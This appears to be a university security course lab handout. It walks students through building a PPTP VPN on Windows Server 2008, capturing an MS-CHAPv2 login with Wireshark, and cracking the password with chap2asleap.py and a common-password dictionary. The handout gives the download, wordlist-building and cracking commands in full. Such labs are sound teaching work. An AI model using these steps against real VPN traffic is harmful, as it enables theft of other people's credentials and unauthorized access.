Moxie Marlinspike has set up a cloud service that performs a complete brute-force attack to recover any password sent via MS-CHAPv2 for $200. However, we don't have $200 to spend, so we'll settle for a weaker attack using a dictionary of the top 10,000 passwords.
The point is clear--PPTP with MS-CHAPv2 is unsafe to use. Even an attacker with very modest means can steal passwords from it.
This project uses the following tools:
Open Virtual Machine Settings and add a second Ethernet adapter.
In Virtual Machine Settings, configure Network Adapter 1 to use NAT and Network Adapter 2 to use a private Host-Only network, as shown below.
Start the Windows 2008 Server virtual machine and log in as Administrator with the password P@ssw0rd.
Click Start. Search for Network. Open "Network and Sharing Center".
Troubleshooting
If you are using the Win 2008 I handed out in class, and your virtual machine cannot start, saying that no operating system was found, go into VMware settings and remove the 102 MB hard disk.
Click "Manage Network Connections".
Right-click "Local Area Connection" and click Properties.
Double-click "Internet Protocol Version 4 (TCP/IP)".
Configure the adapter to "Obtain an IP address automatically" and "Obtain DNS server address automatically", as shown below.
Click OK. Click OK.
Right-click "Local Area Connection 2" and click Properties.
Double-click "Internet Protocol Version 4 (TCP/IP)".
Configure the adapter with these settings, as shown below.
In Server Manager, in the right pane, scroll down to the "Roles Summary" section, as shown below, and click "Add Roles".
In the "Add Roles Wizard", click Next.
In the "Select Server Roles" page, check "Network Policy and Access Server", as shown below.
Click Next. Click Next.
In the "Select Role Services" page, check "Network Policy Server" and "Routing and Remote Access Services", as shown below.
Click Next. Click Install.
When you see an "Installation succeeded" message, as shown below, click Close.
Right-click "Routing and Remote Access" and click "Configure and Enable Routing and Remote Access", as shown below.
In the "Welcome to the Routing and Remote Access Server Setup Wizard" screen, click Next.
In the "Configuration" screen, click "Custom Configuration, as shown below, and click Next.
In the "Custom Configuration" screen, check "VPN access", as shown below, and click Next.
Click OK.
Click "Start Service".
Click Finish.
Then Right-click on "Remote Access Logging and Policies", as shown below, and click "Launch NPS".
In Network Policy Server, in the left pane, click "Network Policies".
In the right pane, near the top, right-click "Connections to Microsoft Routing and Remote Access server" policy and click Properties.
In the center of the "Connections to Microsoft Routing and Remote Access server Properties" sheet, click "Grant Access" as shown below.
Click OK.
Close the "Network Policy Server" window.
On the General tab, check the "IPv4 Router box.
Make sure that "Local area network (LAN) routing only" is selected, as shown below.
Check the "IPv4 Remote access server" box, as shown below.
Click the IPv4 tab.
Check the "Enable IPv4 Forwarding" box, as shown below.
Click OK.
The changes you made require the "Routing and Remote Acccess" server to restart. Click Yes to restart the server.
In the IPv4 section, right-click General, as shown below, and click "New Routing Protocol".
In the "New Routing Protocol" box, click NAT, as shown below.
Click OK.
In the left pane of Server Manager, in the IPv4 section, right-click NAT, and click "New Interface", as shown below.
In the "New Interface for IPNAT" box, click "Local Area Connection 2", the interface that connects to your private intranet, and then click OK, as shown below.
In "Local Area Connection 2 Properties", click "Private interface connected to private network", as shown below.
Then click OK, and click OK again.
Right-click NAT, and click "New Interface" again.
In the "New Interface for IPNAT" box, click "Local Area Connection", and then click OK,
In "Local Area Connection 2 Properties", click "Public interface connected to the Internet" and "Enable NAT on this interface", as shown below.
Then click OK.
In the right pane, right-click an empty portion of the screen and click "New User", as shown below.
In the New User box, enter these values, as shown below.
Click Create. Click Close.
In Server Manager, in the left pane, right-click "Routing and Remote Access" and click Properties.
In the "Routing and Remote Access Properties", on the "Security" tab, sheet, click the "Authentication Methods" button.
In the "Authentication Methods" box, clear the "Extensible authentication protocol (EAP)" box, so that only "Microsoft encrypted authentication version 2 (MS-CHAP-v2)" is checked, as shown below.
Click OK. Click OK.
Execute these commands to download the hacking tool we need, and a list of the 10,000 most common passwords:
wget https://github.com/xiao106347/chap2asleap/raw/master/chap2asleap.py
curl https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10k-most-common.txt > words.dat
head words.dat
You see the first 10 passwords,
as shown below.
Troubleshooting
If those download links don't work, use these:curl https://samsclass.info/124/proj14/chap2asleap.pyx > chap2asleap.py
wget https://samsclass.info/124/proj14/10k_most_common.txt
We'll do that with Bash commands, as you've done previously. First we'll work with only the first 10 words to develop the command, and then run it on the complete list.
Execute this command to select words that start with a letter:
head words.dat | grep "^[a-z].*"
The desired passwords appear,
as shown below.
Execute this command to convert the first letters of those passwords to uppercase:
head words.dat | grep "^[a-z].*" | sed -r 's/([[:lower:]])/\U\1/'
The desired passwords appear,
as shown below.
Execute these commands to put all the capitalized passwords into a file named Words.dat, and examine the files:
cat words.dat | grep "^[a-z].*" | sed -r 's/([[:lower:]])/\U\1/' > Words.dat
ls -l
The new file Words.dat is somewhat smaller
than words.dat, because it excludes passwords
that begin with a numeral,
as shown below.
Execute these commands to put all the passwords in a file named allwords.dat, and examine the files:
cat words.dat Words.dat >> allwords.dat
ls -l
The new file allwords.dat
has a length equal to the sum of the
two files "words.dat" and "Words.dat",
as shown below.
apt update
apt install pptp-linux
In your Kali VM, execute this command:
nano /etc/ppp/chap-secrets
Add this line to the file, as shown
below:
vpnuser PPTP Bond007 *
Save the file by pressing Ctrl+X, Y, Enter.
In your Kali VM, execute this command:
nano /etc/ppp/peers/YOURNAME-pptp
Enter these lines, as shown
below. Replace "YOURNAME"
with your own name, without
any embedded spaces.
pty "pptp 10.0.0.1 --nolaunchpppd"
name vpnuser
remotename PPTP
require-mppe-128
file /etc/ppp/options.pptp
ipparam YOURNAME-pptp
In Kali, in a Terminal window, execute these commands to assign an appropriate IP address to eth0 and test the networking:
ifconfig eth0 10.0.0.3/8
ping 10.0.0.1
You should see replies, as shown
below. If you don't, make sure
the Windows 2008 Server's
firewall is off.
Press Ctrl+C to stop the pings.
Troubleshooting
If you cannot ping from one machine to another, change both the Windows and Kali adapters to DHCP and refresh both IP addresses. Now ping from one to another using the DHCP address. Then assign the 10.0.0.0/8 addresses.
pon YOURNAME-pptp debug dump logfd 2 nodetach
A lot of messages scroll by, ending with the
lines shown below, showing a "local UP address".
In the right pane, you should see a connected machine, as shown below.
Click on the host system's desktop to make it active.
Press the PrintScrn key to copy the whole desktop to the clipboard.
YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!
Paste the image into Paint.
Save the document with the filename "YOUR NAME Proj 10a", replacing "YOUR NAME" with your real name.
wireshark
A "Lua error" box appears. Click OK.
A box warns us that running as root is dangerous. We laugh at danger. Click OK.
In Wireshark, click eth0 and click Start.
In the Filter box, type:
chap
and press Enter.
The packet list should be empty, as shown below.
Then execute this command to connect again:
pon YOURNAME-pptp debug dump logfd 2 nodetach
A lot of messages scroll by, ending with the
lines shown below, showing a "local IP address".
Click the red square icon to stop the packet capture.
python chap2asleap.py -u vpnuser -c CHALLENGE -r RESPONSE -x -p /usr/bin -d ./allwords.dat
This command will use our "allwords.dat" dictionary file
and try all those passwords to match the CHALLENGE and RESPONSE strings we get from Wireshark.
At this point, your text editor should look like this:
In the middle pane, expand PPP. Expand Data. Click on Value to highlight it, as shown below.
Right-click on Value and click Copy, "Hex Stream", as shown below.
On your host system, in the text editor, paste that hex stream in the place of CHALLENGE.
Your text editor should now resemble this image:
In the top pane of Wireshark, click a Response packet.
In the middle pane, click on Value. Right-click on Value and click Copy, "Hex Stream", as shown below.
On your host system, in the text editor, paste that hex stream in the place of RESPONSE.
Your text editor should now resemble this image:
The attack should succeed immediately, finding the password, as shown below.
Notice how fast it was--this took only 0.06 seconds. We could easily use a much larger dictionary to make the attack even more powerful.
Click on the host system's desktop to make it active.
Press the PrintScrn key to copy the whole desktop to the clipboard.
YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!
Paste the image into Paint.
Save the document with the filename "YOUR NAME Proj 10b", replacing "YOUR NAME" with your real name.
Hacking PPTP VPN With Backtrack (from 2012)
How to setup a VPN Server in Windows Server 2008
VPN error 812: The connection was prevented because of a policy configured on your RAS/VPN server
Internet Access through VPN server - need help please